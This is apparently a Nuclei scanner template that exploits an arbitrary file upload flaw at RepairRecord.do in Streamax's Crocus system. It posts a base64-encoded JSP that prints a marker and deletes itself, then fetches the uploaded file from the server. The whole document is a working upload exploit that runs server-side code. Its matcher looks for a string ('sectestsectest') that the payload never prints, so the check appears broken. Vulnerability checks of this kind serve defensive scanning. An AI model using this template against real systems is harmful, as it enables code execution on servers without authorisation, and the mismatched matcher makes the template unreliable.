id: ruiming-Crocus-RepairRecord_do-File-upload

info:
  name: 锐明技术Crocus系统 RepairRecord.do 任意文件上传漏洞
  author: ruiming
  severity: high
  tags: File upload

variables:
  username: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列

http:
  - raw:
      - |
        POST /RepairRecord.do?Action=imageupload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "username": "streamax20020818",
          "license": "1",
          "chnnel": 1,
          "type": 1,
          "imsage": "PCUgb3V0LnByaW50bG4oInBib3lqbm5yZmlwbXBsc3VrZGVjenVkc2VmeG15d2UiKTsgbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTsgJT4=",
          "picturename": "{{username}}.jsp"
        }
  - raw:
      - |
        GET /SystemFile/PictureRecord/imageupload/{{username}}.jsp HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sectestsectest'
      - type: status
        status: 
          - 200